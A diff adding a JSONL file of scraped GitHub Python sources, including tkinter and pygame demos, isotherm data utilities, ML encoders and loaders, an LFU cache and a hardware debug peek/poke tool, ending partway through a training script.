diff --git "a/6249.jsonl" "b/6249.jsonl" new file mode 100644--- /dev/null +++ "b/6249.jsonl" @@ -0,0 +1,1975 @@ +{"seq_id":"11450255013","text":"import tkinter as tk\nfrom tkinter import *\nfrom tkinter.constants import *\nimport random\nfrom tkinter import messagebox\n\ndef font():\n dict = {0: 'Arial', 1: 'Courier', 2: 'Times', 3: 'Helvetica'}\n fontchoice=random.choice(dict)\n print(fontchoice)\n if checkbtn1.getint(0) == 0:\n label.config(font=fontchoice)\n elif checkbtn2.getint(1) == 1:\n label.config(font='calibri')\n print(\"font\",label.config().get(\"font\"))\n else:\n messagebox.showerror('TKINTER FONT', 'Something went wrong')\n\nwindow = tk.Tk()\nwindow.title(\"Slip 6b\")\nwindow.geometry(\"800x600\")\nlabel = tk.Label(window, text=\"Font Style\")\nlabel.grid(column=0, row=0)\nlabel.pack()\ncheckbtn1 = tk.Checkbutton(window, text=\"Font Style\", height=\"2\", width=\"20\", onvalue=1, offvalue=0, command=font)\ncheckbtn1.pack()\ncheckbtn2 = tk.Checkbutton(window, text=\"Font Size\", height=\"2\", width=\"20\")\ncheckbtn2.pack()\ncheckbtn3 = tk.Checkbutton(window, text=\"Font Bold\", height=\"2\", width=\"20\")\ncheckbtn3.pack()\n\nwindow.mainloop()","repo_name":"Snag-hub/PYTHON","sub_path":"slip6b.py","file_name":"slip6b.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"44087040469","text":"from os.path import exists\nfrom os import mkdir\nimport os\nimport pandas as pd\nimport glob\nimport pygaps.parsing as pgp\nimport pandas as pd\nimport warnings\n\n\ndef strictly_increasing(List):\n increasing = [x < y for x, y in zip(List, List[1:])]\n increasing.append(increasing[-1])\n return increasing\n\n\ndef clean_isotherms(\n input_dir: str = './',\n output_dir: str = './clean/'\n):\n print(f'Cleaning isotherms in {input_dir} and placing in {output_dir}...')\n if not exists(output_dir):\n mkdir(output_dir)\n\n files = glob.glob(f'{input_dir}*.csv')\n for f in files:\n isotherm = pd.read_csv(\n f,\n names=['relative_pressure', 'loading'],\n header=0,\n )\n\n relative_pressure = isotherm['relative_pressure'].to_list()\n increasing = strictly_increasing(relative_pressure)\n isotherm = isotherm.assign(increasing=increasing)\n isotherm = isotherm[isotherm.increasing == True]\n isotherm = isotherm.drop(columns=['increasing'])\n\n isotherm.to_csv(\n f'{output_dir}{f.split(input_dir)[1]}',\n index=False,\n )\n\n print(\n f'...{len(files)} cleaned and saved in {output_dir}\\n\\n'\n )\n\n return output_dir\n\n\ndef convert_aif(\n file: str,\n output_dir:str = './csv/',\n):\n filename = os.path.split(file)[1]\n name, ext = os.path.splitext(filename)\n if ext[1:] not in ['aif', 'aiff']:\n return\n\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n isotherm = pgp.isotherm_from_aif(file)\n\n pressure = isotherm.data_raw['pressure']\n loading = isotherm.data_raw['loading']\n if 'pressure_saturation' in isotherm.data_raw:\n pressure = pressure / \\\n isotherm.data_raw['pressure_saturation']\n\n df = pd.DataFrame(list\n (zip(\n pressure, loading\n )\n ), columns=['P/P0', 'loading']\n )\n\n if not exists(output_dir):\n mkdir(output_dir)\n df.to_csv(f'{output_dir}{name}.csv')\n\n return name\n\n\ndef convert_aif_dir(\n input_dir: str = './',\n output_dir: str = './csv/'\n):\n aif_files = glob.glob(f'{input_dir}*.aif') + \\\n glob.glob(f'{input_dir}*.aiff')\n if len(aif_files) > 0:\n print(\n f'{len(aif_files)} aif files found in {input_dir}. '\n f'converting to csv for use in autobetsi.\\n'\n )\n names = []\n for file in glob.glob(input_dir):\n name = convert_aif(file)\n names.append(name)\n\n return names\n\n","repo_name":"sblanky/autobetsi","sub_path":"autobetsi/cleaning.py","file_name":"cleaning.py","file_ext":"py","file_size_in_byte":2583,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"73124867959","text":"import pygame\nimport os, sys\n\n\nclass ElementoQuimico:\n nomeElemento = ''\n familia = 0\n letra = ''\n\n cor = (0, 0, 0)\n corTexto = (0, 0, 0)\n\n fonteLetra = ''\n fonteNomeElemento = ''\n\n base = 55\n altura = 70\n\n x = 0\n y = 0\n\n # TRATAMENTO DE CORES\n hidrogenio = (220, 220, 220)\n metaisAlcalinos = (255, 165, 0)\n metaisAlcalinosTerrosos = (255, 215, 0)\n familiaBoro = (72, 209, 204)\n familiaCarbono = (107, 142, 35)\n familiaNitrogenio = (34, 139, 34)\n calcogenios = (221, 160, 221)\n halogenios = (255, 105, 180)\n gasesNobres = (135, 206, 250)\n\n def __init__(self, nomeElemento, familia, letra):\n pygame.font.init()\n\n self.nomeElemento = nomeElemento\n self.familia = familia\n self.letra = letra\n\n self.fonteLetra = pygame.font.SysFont('Arial', 30)\n self.fonteNomeElemento = pygame.font.SysFont('Arial', 12)\n\n if int(self.familia) == 0:\n self.cor = self.hidrogenio\n elif int(self.familia) == 1:\n self.cor = self.metaisAlcalinos\n elif int(self.familia) == 2:\n self.cor = self.metaisAlcalinosTerrosos\n elif int(self.familia) == 3:\n self.cor = self.familiaBoro\n elif int(self.familia) == 4:\n self.cor = self.familiaCarbono\n elif int(self.familia) == 5:\n self.cor = self.familiaNitrogenio\n elif int(self.familia) == 6:\n self.cor = self.calcogenios\n elif int(self.familia) == 7:\n self.cor = self.halogenios\n elif int(self.familia) == 8:\n self.cor = self.gasesNobres\n else:\n self.cor = (255, 255, 224)\n\n def desenhaElemento(self, gameDisplay, x, y):\n posicaoNomeElemento = (x + 2, y + 55)\n posicaoLetraElemento = (x + 15, y + 10)\n\n letraElemento = self.fonteLetra.render(self.letra, 1, self.corTexto)\n nomeElemento = self.fonteNomeElemento.render(self.nomeElemento, 1, self.corTexto)\n\n pygame.draw.rect(gameDisplay, self.cor, [x, y, self.base, self.altura])\n\n gameDisplay.blit(letraElemento, posicaoLetraElemento)\n gameDisplay.blit(nomeElemento, posicaoNomeElemento)\n","repo_name":"JoaoVitorJuliao/PCA-EasyCode","sub_path":"quimica/ElementoQuimico.py","file_name":"ElementoQuimico.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17148616359","text":"import tensorflow.compat.v1 as tf\ntf.disable_v2_behavior()\nimport numpy as np\n\ndef xavier_init(fan_in, fan_out, constant=1):\n \"\"\" Xavier initialization of network weights\"\"\"\n # https://stackoverflow.com/questions/33640581/how-to-do-xavier-initialization-on-tensorflow\n low = -constant*np.sqrt(6.0/(fan_in + fan_out))\n high = constant*np.sqrt(6.0/(fan_in + fan_out))\n return tf.random_uniform((fan_in, fan_out),\n minval=low, maxval=high,\n dtype=tf.float32)\n\ndef init_u(n_in):\n return tf.Variable(xavier_init(n_in, 1))\n\ndef init_w(n_in):\n return tf.Variable(xavier_init(n_in, 1))\n\ndef init_b(n_in):\n return tf.Variable(xavier_init(n_in, 1))\n\ndef ConditionalEncoder(params):\n n_filters = params[\"n_filters\"] #10\n filter_size = params[\"filter_size\"] #10\n pool_size = params[\"pool_size\"] #5\n n_hidden = params[\"n_hidden\"] #50\n data_format = params[\"data_format\"] #channel_last by default: 默认最后一位是channel\n lambda_l2 = params[\"lambda_l2\"] #0.1\n lambda_l2_hidden = params[\"lambda_l2_hidden\"] #0.1\n transfer_func = params[\"transfer_func\"] #tanh\n return tf.keras.Sequential([\n tf.keras.layers.Conv1D(n_filters, filter_size, #output最后一维的维度和filter的个数相等 ()\n data_format=data_format, \n kernel_regularizer=tf.keras.regularizers.l2(lambda_l2), #对该层的权重值进行正则化\n kernel_initializer=tf.orthogonal_initializer()),\n tf.keras.layers.AveragePooling1D(pool_size=pool_size, strides=1, data_format=data_format),\n tf.keras.layers.Flatten(),\n tf.keras.layers.Dense(\n units=n_hidden,\n activation=transfer_func,\n kernel_initializer=tf.orthogonal_initializer(),\n kernel_regularizer=tf.keras.regularizers.l2(lambda_l2_hidden))\n ])","repo_name":"Jimmy-Chen-Ruijie/vi-hds-master-tensorflow","sub_path":"src/encoders.py","file_name":"encoders.py","file_ext":"py","file_size_in_byte":1876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19020361399","text":"import functools\nimport inspect\nimport warnings\n\n\ndef _deprecated(reason: str):\n \"\"\"Decorator for deprecated functions/classes.\n\n Example\n @deprecated('use print_a instead.')\n def printA():\n print('A')\n \"\"\"\n\n if isinstance(reason, str):\n\n def decorator(func1):\n\n if inspect.isclass(func1):\n fmt1 = \"Call to deprecated class {name} ({reason}).\"\n else:\n fmt1 = \"Call to deprecated function {name} ({reason}).\"\n\n @functools.wraps(func1)\n def new_func1(*args, **kwargs):\n warnings.simplefilter('always', DeprecationWarning)\n warnings.warn(fmt1.format(name=func1.__name__, reason=reason),\n category=DeprecationWarning,\n stacklevel=2)\n warnings.simplefilter('default', DeprecationWarning)\n return func1(*args, **kwargs)\n\n return new_func1\n\n return decorator\n\n # if no reasons is given\n elif inspect.isclass(reason) or inspect.isfunction(reason):\n func2 = reason\n\n if inspect.isclass(func2):\n fmt2 = \"Call to deprecated class {name}.\"\n else:\n fmt2 = \"Call to deprecated function {name}.\"\n\n @functools.wraps(func2)\n def new_func2(*args, **kwargs):\n warnings.simplefilter('always', DeprecationWarning)\n warnings.warn(fmt2.format(name=func2.__name__),\n category=DeprecationWarning,\n stacklevel=2)\n warnings.simplefilter('default', DeprecationWarning)\n return func2(*args, **kwargs)\n\n return new_func2\n\n else:\n raise TypeError(repr(type(reason)))\n","repo_name":"BaksiLi/chien-shiung","sub_path":"qulab/compatibility.py","file_name":"compatibility.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14431832096","text":"import spindry as spd\n\nfrom stk._internal.construction_state.construction_state import (\n ConstructionState,\n)\n\nfrom .optimizer import Optimizer\n\n\nclass Spinner(Optimizer):\n \"\"\"\n Performs Monte Carlo optimisation of host-guest complexes.\n\n Examples:\n\n *Structure Optimization*\n\n Using :class:`.Spinner` will lead to\n :class:`.ConstructedMolecule` structures with better host-guest\n structures. Especially useful for multiple-guest systems and\n removing overlap.\n\n .. testcode:: structure-optimization\n\n import stk\n\n bb1 = stk.BuildingBlock(\n smiles='NCCN',\n functional_groups=[stk.PrimaryAminoFactory()],\n )\n bb2 = stk.BuildingBlock(\n smiles='O=CC(C=O)C=O',\n functional_groups=[stk.AldehydeFactory()],\n )\n guest1 = stk.host_guest.Guest(\n building_block=stk.BuildingBlock('c1ccccc1'),\n )\n guest2 = stk.host_guest.Guest(\n building_block=stk.BuildingBlock('C1CCCCC1'),\n )\n cage = stk.ConstructedMolecule(\n topology_graph=stk.cage.FourPlusSix(\n building_blocks=(bb1, bb2),\n optimizer=stk.MCHammer(),\n ),\n )\n\n complex = stk.ConstructedMolecule(\n topology_graph=stk.host_guest.Complex(\n host=stk.BuildingBlock.init_from_molecule(cage),\n guests=(guest1, guest2),\n optimizer=stk.Spinner(),\n ),\n )\n\n Optimisation with :mod:`stk` simply collects the final position\n matrix. The optimisation's trajectory can be output using the\n :mod:`SpinDry` implementation if required by the user\n [#spindry]_. This code is entirely nonphysical and is,\n therefore, completely general to any chemistry.\n\n References:\n\n .. [#spindry] https://github.com/andrewtarzia/SpinDry\n\n \"\"\"\n\n def __init__(\n self,\n step_size: float = 1.5,\n rotation_step_size: float = 5.0,\n num_conformers: int = 50,\n max_attempts: int = 1000,\n nonbond_epsilon: float = 5.0,\n beta: float = 2.0,\n random_seed: int = 1000,\n ) -> None:\n \"\"\"\n Initialize an instance of :class:`.Spinner`.\n\n Parameters:\n step_size: The relative size of the step to take during\n step.\n\n rotation_step_size: The relative size of the rotation to\n take during step.\n\n num_conformers: Number of conformers to extract.\n\n max_attempts: Maximum number of MC moves to try to generate\n conformers.\n\n nonbond_epsilon: Value of epsilon used in the nonbonded\n potential in MC moves. Determines strength of the\n nonbonded potential.\n\n beta: Value of beta used in the in MC moves. Beta takes the\n place of the inverse boltzmann temperature.\n\n random_seed: Random seed to use for MC algorithm.\n\n \"\"\"\n\n self._optimizer = spd.Spinner(\n step_size=step_size,\n rotation_step_size=rotation_step_size,\n num_conformers=num_conformers,\n max_attempts=max_attempts,\n potential_function=spd.SpdPotential(\n nonbond_epsilon=nonbond_epsilon,\n ),\n beta=beta,\n random_seed=random_seed,\n )\n\n def optimize(self, state: ConstructionState) -> ConstructionState:\n supramolecule = spd.SupraMolecule(\n atoms=(\n spd.Atom(\n id=atom.get_id(),\n element_string=atom.__class__.__name__,\n )\n for atom in state.get_atoms()\n ),\n bonds=(\n spd.Bond(\n id=i,\n atom_ids=(\n bond.get_atom1().get_id(),\n bond.get_atom2().get_id(),\n ),\n )\n for i, bond in enumerate(state.get_bonds())\n ),\n position_matrix=state.get_position_matrix(),\n )\n\n conformer = self._optimizer.get_final_conformer(supramolecule)\n return state.with_position_matrix(\n position_matrix=conformer.get_position_matrix(),\n )\n","repo_name":"lukasturcani/stk","sub_path":"src/stk/_internal/optimizers/spinner.py","file_name":"spinner.py","file_ext":"py","file_size_in_byte":4456,"program_lang":"python","lang":"en","doc_type":"code","stars":212,"dataset":"github-code","pt":"40"} +{"seq_id":"23870563275","text":"import sys\nimport struct\nfrom debugpipe import DebugPipe\nimport getopt\n\n\n################################################################################\n\ndef padUpToWord(data):\n l = len(data) & 3\n if l > 0:\n return data + bytearray([0 for x in range(4-l)])\n else:\n return data\n\ndef quick_test(dp):\n str = padUpToWord('This is an amazing string!')\n print(str)\n dp.write(0, str)\n\n rstr = dp.read(0, len(str))\n\n if str == rstr:\n print('Success')\n else:\n print('String mismatch: \"%s\" vs \"%s\"' % (str, rstr))\n\n\ndef write_file(dp, addr, name):\n with open(name, \"rb\") as infile:\n fdata = infile.read()\n addr = int(addr, 0)\n waddr = addr & ~3;\n if (addr & 3) != 0:\n print(\"WARNING: Rounding given address 0x%x down to 0x%x\" % (addr, waddr))\n\n l = len(fdata)\n if (l & 3) != 0:\n print(\"WARNING: Zero-padding data to extend to 4-byte alignment (size %d)\" \\\n % (l))\n fdata = fdata + bytearray([0 for x in range(4-(l & 3))])\n dp.write(waddr, fdata, verbose=True)\n\n\ndef read_file(dp, addr, length, name):\n addr = int(addr, 0)\n raddr = addr & ~3;\n if (addr & 3) != 0:\n print(\"WARNING: Rounding given address 0x%x down to 0x%x\" % (addr, raddr))\n\n length = int(length, 0)\n if (length & 3) != 0:\n print(\"WARNING: Truncating length %d to 4-byte alignment\" \\\n % (length))\n length &= length & ~3\n wdata = dp.read(raddr, length, verbose=True)\n\n with open(name, \"wb\") as outfile:\n outfile.write(wdata)\n\n\ndef read_word(dp, addr, big_endian=False):\n addr = int(addr, 0)\n raddr = addr & ~3;\n if (addr & 3) != 0:\n print(\"WARNING: Rounding given address 0x%x down to 0x%x\" % (addr, raddr))\n i = dp.read32(raddr, big_endian=big_endian)\n print(\"[%08x] => %08x\" % (raddr, i))\n\n\ndef write_word(dp, addr, val, big_endian=False):\n addr = int(addr, 0)\n val = int(val, 0)\n waddr = addr & ~3;\n if (addr & 3) != 0:\n print(\"WARNING: Rounding given address 0x%x down to 0x%x\" % (addr, waddr))\n dp.write32(waddr, val, big_endian=big_endian)\n print(\"[%08x] <= %08x\" % (waddr, val))\n\n\ndef usage(s):\n print(\"%s [options] \\n\" \\\n \"\\tOptions: \\n\" \\\n \"\\t\\t-s Connect using serial link via tty\\n\" \\\n \"\\t\\t-t Connect using TCP socket to host\\n\" \\\n \"\\t\\t-f Connect using FTDI url\\n\" \\\n \"\\t\\t-v Verbose debug\\n\" \\\n \"\\t\\t-b Big-endian read/write word\\n\" \\\n \"\\tCommands: \\n\" \\\n \"\\t\\ttest Quick test\\n\" \\\n \"\\t\\tread Read file from address\\n\" \\\n \"\\t\\twrite Write file to address\\n\" \\\n \"\\t\\trw Read word from address\\n\" \\\n \"\\t\\tww Write word to address\\n\" \\\n % (s))\n\n################################################################################\n\n\ntry:\n opts, args = getopt.getopt(sys.argv[1:], \"hvbs:t:f:\")\nexcept getopt.GetoptError as err:\n usage(sys.argv[0])\n print(\"Invocation error: \" + str(err))\n sys.exit(1)\n\nverbose = False\nconn = None\nconn_arg = \"\"\nbig_endian = False\n\nfor o, a in opts:\n if o == \"-h\":\n usage(sys.argv[0])\n sys.exit(1)\n elif o == \"-v\":\n verbose = True\n elif o == \"-b\":\n big_endian = True\n elif o == \"-s\" or o == \"-t\" or o == \"-f\":\n if conn is not None:\n usage(sys.argv[0])\n print(\"Multiple connections specified\");\n sys.exit(1)\n conn = o\n conn_arg = a\n\n\ndp = None\nif conn is None:\n usage(sys.argv[0])\n print(\"Need one of -s or -t!\");\n sys.exit(1)\nelif conn == \"-s\":\n dp = DebugPipe(tty=conn_arg, debug=verbose)\nelif conn == \"-t\":\n dp = DebugPipe(host=conn_arg, debug=verbose)\nelif conn == \"-f\":\n dp = DebugPipe(url=conn_arg, debug=verbose)\n\n\n# Parse commands:\nna = len(args)\nif na == 1 and args[0] == \"test\":\n quick_test(dp)\nelif na == 4 and args[0] == \"read\":\n read_file(dp, args[1], args[2], args[3])\nelif na == 3 and args[0] == \"write\":\n write_file(dp, args[1], args[2])\nelif na == 2 and args[0] == \"rw\":\n read_word(dp, args[1], big_endian)\nelif na == 3 and args[0] == \"ww\":\n write_word(dp, args[1], args[2], big_endian)\nelse:\n usage(sys.argv[0])\n sys.exit(1)\n\ndp.disconnect()\n","repo_name":"evansm7/MR-sys","sub_path":"tools/debug_peek_poke.py","file_name":"debug_peek_poke.py","file_ext":"py","file_size_in_byte":4563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9691745368","text":"# # for\n# friends= ['ali, mahdi, hosein']\n# count=0;\n\n# for i in friends :\n# print('hi', i);\n# count=count+1;\n\n# print('i said ....', count, 'hello' );\n\n\nfor i in range(10):\n if not i % 2 == 0:\n print(i+1)\n","repo_name":"devcodeplus/python-jadi-Intro","sub_path":"z-ex-02-for.py","file_name":"z-ex-02-for.py","file_ext":"py","file_size_in_byte":218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21204496207","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom __future__ import division\r\nfrom __future__ import print_function\r\n\r\nimport os\r\nimport random\r\nimport codecs\r\nimport numpy as np\r\nimport cv2\r\nfrom SamplePreprocessor import preprocess\r\n\r\n\r\nclass Sample:\r\n\t\"sample from the dataset\"\r\n\tdef __init__(self, gtText, filePath):\r\n\t\tself.gtText = gtText\r\n\t\tself.filePath = filePath\r\n\r\n\r\nclass Batch:\r\n\t\"batch containing images and ground truth texts\"\r\n\tdef __init__(self, gtTexts, imgs):\r\n\t\tself.imgs = np.stack(imgs, axis=0)\r\n\t\tself.gtTexts = gtTexts\r\n\r\n\r\nclass DataLoader:\r\n\t\"loads data which corresponds to IAM format, see: http://www.fki.inf.unibe.ch/databases/iam-handwriting-database\" \r\n\r\n\tdef __init__(self, filePath, batchSize, imgSize, maxTextLen):\r\n\t\t\"loader for dataset at given location, preprocess images and text according to parameters\"\r\n\r\n\t\tassert filePath[-1]=='/' # should end with '/'\r\n\r\n\t\tself.dataAugmentation = False\r\n\t\tself.currIdx = 0\r\n\t\tself.batchSize = batchSize\r\n\t\tself.imgSize = imgSize\r\n\t\tself.samples = []\r\n\t\t# use your own path and trick to read the images with the txt file\r\n\t\twith codecs.open(filePath+'full.txt', \"r\", encoding='utf-8') as f:\r\n\t\t\tlines = f.readlines()\r\n\t\tlines = [x.strip() for x in lines] # removing newline\r\n\t\tchars = set()\r\n\t\tprint(lines[2])\r\n\t\tfor line in lines:\r\n\t\t\t# ignore comment line\r\n\t\t\tif not line or line[0]=='#':\r\n\t\t\t\tcontinue\r\n\t\t\t\r\n\t\t\tlineSplit = line.strip().split(' ')\r\n\r\n\t\t\tif lineSplit[0] == '\\ufeff': # since reading first line give '\\ufeff'\r\n\t\t\t\tcontinue\r\n\r\n\t\t\tfileName = filePath + lineSplit[0]\r\n\r\n\t\t\t# GT text are columns starting at 1\r\n\t\t\tgtText = self.truncateLabel(' '.join(lineSplit[1]), maxTextLen)\r\n\t\t\tchars = chars.union(set(list(gtText)))\r\n\r\n\t\t\t# check if image is not empty\r\n\t\t\tif not os.path.getsize(fileName):\r\n\t\t\t\t#bad_samples.append(lineSplit[0] + '.jpg')\r\n\t\t\t\tcontinue\r\n\r\n\t\t\t# put sample into list\r\n\t\t\tself.samples.append(Sample(gtText, fileName))\r\n\r\n\r\n\r\n\t\t# split into training and validation set: 95% - 5%\r\n\t\tsplitIdx = int(0.95 * len(self.samples))\r\n\t\tself.trainSamples = self.samples[:splitIdx]\r\n\t\tself.validationSamples = self.samples[splitIdx:]\r\n\r\n\t\t# put words into lists\r\n\t\tself.trainWords = [x.gtText for x in self.trainSamples]\r\n\t\tself.validationWords = [x.gtText for x in self.validationSamples]\r\n\r\n\t\t# number of randomly chosen samples per epoch for training \r\n\t\tself.numTrainSamplesPerEpoch = 25000 \r\n\t\t\r\n\t\t# start with train set\r\n\t\tself.trainSet()\r\n\r\n\t\t# list of all chars in dataset\r\n\t\tself.charList = sorted(list(chars))\r\n\t\t# print(\"TrainSet: {}, TestSet: {}\".format(len(self.trainSamples), len(self.validationSamples)))\r\n\t\t# print(\"Total chars: \",len(self.charList)) # length: 109\r\n\t\t# charList = ''.join([str(x) for x in self.charList])\r\n\t\t# print(charList)\r\n\t\t# codecs.open('../model/charList.txt','w', encoding='utf-8').write(charList)\r\n\r\n\tdef truncateLabel(self, text, maxTextLen):\r\n\t\t# ctc_loss can't compute loss if it cannot find a mapping between text label and input \r\n\t\t# labels. Repeat letters cost double because of the blank symbol needing to be inserted.\r\n\t\t# If a too-long label is provided, ctc_loss returns an infinite gradient\r\n\t\tcost = 0\r\n\t\tfor i in range(len(text)):\r\n\t\t\tif i != 0 and text[i] == text[i-1]:\r\n\t\t\t\tcost += 2\r\n\t\t\telse:\r\n\t\t\t\tcost += 1\r\n\t\t\tif cost > maxTextLen:\r\n\t\t\t\treturn text[:i]\r\n\t\treturn text\r\n\r\n\tdef trainSet(self):\r\n\t\t\"switch to randomly chosen subset of training set\"\r\n\t\tself.dataAugmentation = True\r\n\t\tself.currIdx = 0\r\n\t\trandom.shuffle(self.trainSamples)\r\n\t\tself.samples = self.trainSamples[:self.numTrainSamplesPerEpoch]\r\n\r\n\tdef validationSet(self):\r\n\t\t\"switch to validation set\"\r\n\t\tself.dataAugmentation = False\r\n\t\tself.currIdx = 0\r\n\t\tself.samples = self.validationSamples\r\n\r\n\tdef getIteratorInfo(self):\r\n\t\t\"current batch index and overall number of batches\"\r\n\t\treturn (self.currIdx // self.batchSize + 1, len(self.samples) // self.batchSize)\r\n\r\n\tdef hasNext(self):\r\n\t\t\"iterator\"\r\n\t\treturn self.currIdx + self.batchSize <= len(self.samples)\r\n\t\t\r\n\tdef getNext(self):\r\n\t\t\"iterator\"\r\n\t\tbatchRange = range(self.currIdx, self.currIdx + self.batchSize)\r\n\t\tgtTexts = [self.samples[i].gtText for i in batchRange]\r\n\t\timgs = [preprocess(cv2.imread(self.samples[i].filePath, cv2.IMREAD_GRAYSCALE), self.imgSize, self.dataAugmentation) for i in batchRange]\r\n\t\tself.currIdx += self.batchSize\r\n\t\treturn Batch(gtTexts, imgs)\r\n\r\n\r\n#DataLoader('../data/', 50, (128,32), 32)\r\n","repo_name":"sushant097/Devnagari-Handwritten-Word-Recongition-with-Deep-Learning","sub_path":"src/DataLoader.py","file_name":"DataLoader.py","file_ext":"py","file_size_in_byte":4380,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"40"} +{"seq_id":"6484493404","text":"import pygame\nimport random\nimport math\npygame.init()\n\npygame.display.set_caption(\"고군분투\")\n\nscreen_width = 800\nscreen_height = 500\nscore = 0\n# font\npygame.font.init()\nmyFont = pygame.font.SysFont(\"Comic Sans MS\", 30)\nscreen = pygame.display.set_mode((screen_width, screen_height))\n\ntrapX1 = 950\ntrapX2 = 1050\n\n\nbg1 = pygame.image.load(\"e:/dev/python_workspace/img/bg1.jpg\")\nbg2 = pygame.image.load(\"e:/dev/python_workspace/img/bg2.jpg\")\nbg1X = 0\nbg2X = screen_width\n\nrun1 = pygame.image.load(\"e:/dev/python_workspace/img/run1.png\")\nrun2 = pygame.image.load(\"e:/dev/python_workspace/img/run2.png\")\nrun3 = pygame.image.load(\"e:/dev/python_workspace/img/run3.png\")\nrun_list = [run1, run2, run3]\nrx = 0\nry = 270\n\ngold = pygame.image.load(\"e:/dev/python_workspace/img/gold.png\")\nsilver = pygame.image.load(\"e:/dev/python_workspace/img/silver.png\")\n\njump = False\njump_Y = 270\njump_status = 0\n\ncnt = 0\nclock = pygame.time.Clock()\nisRunning = True\n\ncoinList = []\ndef makeCoin(coinObj, color):\n c = Coin(screen_width, random.randint(10, 260), coinObj, color)\n coinList.append(c)\n\ndef collision(x1, y1, x2, y2):\n dis = math.sqrt((x2-x1)**2 + (y2-y1)**2)\n result = 0\n if dis < 50:\n result = 1\n return result\n\nclass Coin:\n def __init__(self, x, y, coinObj, color):\n self.x = x\n self.y = y\n self.coinObj = coinObj\n self.color = color\n \n def __del__(self):\n pass\n # print(\"코인 제거됨\")\n \n\nwhile isRunning:\n fps = clock.tick(60)\n \n bg1X -= 5\n bg2X -= 5\n if bg1X == -screen_width: bg1X = screen_width\n if bg2X == -screen_width: bg2X = screen_width\n screen.blit(bg1, (bg1X, 0))\n screen.blit(bg2, (bg2X, 0))\n\n \n \n cnt += 1\n screen.blit(run_list[(cnt//10)%3], (rx, ry))\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n isRunning = False\n \n if rx < 0: rx = 0\n if rx > screen_width: rx = screen_width - 100\n \n # if rx >= bg2X+150 or rx <= bg2X+250 :\n \n \n keys = pygame.key.get_pressed()\n if keys[pygame.K_LEFT] == 1: rx -= 5\n if keys[pygame.K_RIGHT] == 1: rx += 5\n if keys[pygame.K_SPACE] == 1: \n jump = True\n jump_Y = ry - 100\n if jump_Y < 0: jump_Y = 0\n jump_status = 0\n \n if jump==True:\n if jump_status == 0: # up\n ry -= 10\n if jump_Y >= ry:\n ry = jump_Y\n jump_status = 1\n else: # down \n ry += 10\n if 270 <= ry:\n ry = 270\n jump_status = 0\n jump_Y = 270\n \n if cnt%20 == 0:\n if (cnt//100)%2:\n makeCoin(gold, 'gold')\n else:\n makeCoin(silver, 'silver')\n \n \n for c in coinList:\n # print(c, c.x, c.y)\n screen.blit(c.coinObj, (c.x, c.y))\n c.x -= 5\n if c.x < -100:\n coinList.remove(c)\n del(c)\n \n for c in coinList:\n if collision(rx+50, ry+55, c.x, c.y) == 1:\n c.x = -150\n if c.color == 'gold':\n score += 20\n else:\n score += 10\n \n \n # print(score)\n txt = myFont.render(\"SCORE : \"+str(score), False, (255, 0, 0))\n screen.blit(txt, (600, 20))\n pygame.display.update()\n \n\npygame.quit()","repo_name":"rafinkang/test_python","sub_path":"day18/hw1.py","file_name":"hw1.py","file_ext":"py","file_size_in_byte":3366,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"44588090630","text":"import collections\nclass ListNode:\n def __init__(self, val=0, prev=None,next=None):\n self.val = val\n self.prev = prev\n self.next = next\nclass LinkedList:\n def __init__(self):\n self.left = ListNode(0)\n self.right = ListNode(0,prev=self.left)\n self.left.next = self.right\n self.map = {}\n def length(self):\n return len(self.map)\n def pushRight(self,val):\n node = ListNode(val,self.right.prev,self.right)\n self.map[val] = node\n self.right.prev = node\n node.prev.next = node\n def pop(self,val):\n if val in self.map:\n node = self.map[val]\n next,prev = node.next,node.prev\n next.prev = prev\n prev.next = next\n self.map.pop(val,None)\n def popLeft(self):\n res = self.left.next.val\n self.pop(self.left.next.val)\n return res\n def update(self,val):\n self.pop(val)\n self.pushRight(val)\nclass LFUCache:\n def __init__(self, capacity: int):\n self.capacity = capacity\n self.count = 0\n self.valMap = {}\n self.countMap = collections.defaultdict(int)\n self.listMap = collections.defaultdict(LinkedList)\n def counter(self,key):\n cnt = self.countMap[key]\n self.countMap[key] += 1\n self.listMap[cnt].pop(key)\n self.listMap[cnt+1].pushRight(key)\n if(self.count == cnt and self.listMap[cnt].length() == 0):\n self.count+=1\n def get(self, key: int) -> int:\n if(not key in self.valMap):\n return -1\n self.counter(key)\n return self.valMap[key]\n def put(self, key: int, value: int) -> None:\n if self.capacity == 0:\n return\n if key not in self.valMap and len(self.valMap) == self.capacity:\n res = self.listMap[self.count].popLeft()\n self.valMap.pop(res)\n self.countMap.pop(res)\n self.valMap[key] = value\n self.counter(key)\n self.count = min(self.count,self.countMap[key])\nlfu = LFUCache(2)\nlfu.put(1, 1)\nlfu.put(2, 2)\nlfu.get(1)\nlfu.put(3, 3)\nlfu.get(2)\nlfu.get(3)\nlfu.put(4, 4)\nlfu.get(1)\nlfu.get(3)\nlfu.get(4)\n","repo_name":"Protype8/PythonCompetitionCodes","sub_path":"atcoder/E.py","file_name":"E.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42061868586","text":"import datetime\nimport os\nfrom keras.optimizers import Adadelta\nfrom keras.callbacks import ModelCheckpoint, TensorBoard\nfrom datanail import *\nfrom res_unet import *\nfrom utils import *\n\n# hyper parameters\nmodel_name = \"res_unet_\"\ninput_shape = (512, 512, 1)\ndataset_folder = \"\"\nclasses = 